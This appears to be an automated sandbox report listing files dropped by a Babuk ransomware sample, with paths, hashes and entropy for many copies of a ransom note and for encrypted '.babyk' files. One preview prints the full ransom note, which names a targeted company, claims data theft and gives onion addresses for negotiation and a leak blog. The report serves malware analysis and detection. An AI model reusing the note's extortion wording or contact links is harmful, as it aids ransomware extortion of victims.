                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.58962787557377
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlUmsojldS1C+roi2kkDRSz7Q1qV9glPyU67FrDp9Phll+UxNvEEn:kOS1C2hzkDsM1qVU67ZI0vtn
                                                                            MD5:98DABADFA5DDDEE55518213238E02B7A
                                                                            SHA1:9FCA319009E1652E429144638F50005EE3691BCC
                                                                            SHA-256:4A9D90B85D18F6F17D9908FB74D5C62A31451670552760FC75535E83525E50B1
                                                                            SHA-512:4BA372A02B28FB9978B4D5D9D8F17D71EB3F21B350E8A2DCAB072860BE6B129F9A2942C10C1BA96FB7A117741D4FAF714279BB8ECC8FB80C24E24F6D4C2EE9FF
                                                                            Malicious:false
                                                                            Preview: ......*v.C.B..w...Dh..~.}/%.....-^....7.....".`.;.S..d1..As4.&5!....o@!>BDGl.)P..C.....X.@.m..1.B....x.. /Y........V.6.n.zv.RD....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.976252945970607
                                                                            Encrypted:false
                                                                            SSDEEP:192:ERH/yMCXDI4KC8iqIV0LdaxZiKSU0TY1Az31HPJw4kQyug2ADx:sfyMCRt84V58xUYYGZvJw4T42ADx
                                                                            MD5:77362D63C79727AF6A299126C5863980
                                                                            SHA1:D0CB926279AB9397A5B252482B4C13B5A5DAE461
                                                                            SHA-256:B176F4B9CC123B9C4ABDA1088435C2B0189BBAF602B3DC2D8D5DBA4D969D692C
                                                                            SHA-512:FE3DE029B31E11A789D7A26AD19DD44938EB0CF4BEF8EE4EEF66E91B063C24ABB3B3E11610987B47DF59DAF8782FE5C7C399A47F0C6618AB4867A2EA427C9A2A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.479567012504289
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlVhHi024uVNQALUzXEh1wv2iKJPKFyX3bpvT+rDbM51zovuaLcpnpll+UxNvEEn:vCPtvg7EjwvsD31vTwDu9ovlLcl80vtn
                                                                            MD5:A6EE9E6F77ED99A414C9AFA5B8568707
                                                                            SHA1:61BFEAAA6502E6C5E1DA25643535DC9B33540508
                                                                            SHA-256:FE5F5D68EEF184F1A85EE04241382B3E1154ECD875A896A615A5E4807ECD9F33
                                                                            SHA-512:B2D92FA9A73D35EA82857E32F655F2D309407A5C2D9B0E839C19E20A206DCC73F3C25B397BBF324CCCD73804FB431D9B511C344A8D117BE7B8FC8037A3B50D23
                                                                            Malicious:false
                                                                            Preview: ....i./_b..S]c..... ....$R..2......vi...}...h..X.l`L'..P/...aw`G...!....S#...M..xoVHM.L.Q.)....A!y..9..y.S.i.... .CoW.=.....L.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980166865846239
                                                                            Encrypted:false
                                                                            SSDEEP:192:ORc/X255MBvo+ENZ+YEfT6no6AN4A+ReFwuRctAoh86I:ORQXWyvo+EThfo6A14eLsbrI
                                                                            MD5:1D11B20E4519021F1694F9398631DA43
                                                                            SHA1:2A442E8CDD9A64F3601116E9BDB42E248FD4F09A
                                                                            SHA-256:11639CB1F285A7AF63E25D831EE576D264FAB408013E549CF94B1171E6156000
                                                                            SHA-512:F290802C9A4522C6B138DA4E5CC3E10C67474BF3B86CE6E292EB9A4ED4CA39C6D900FCD04023BC7337FFE0272D15906D87CEA5C23BA2E7B499291808EED21F66
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\How To Restore Your Files.txt
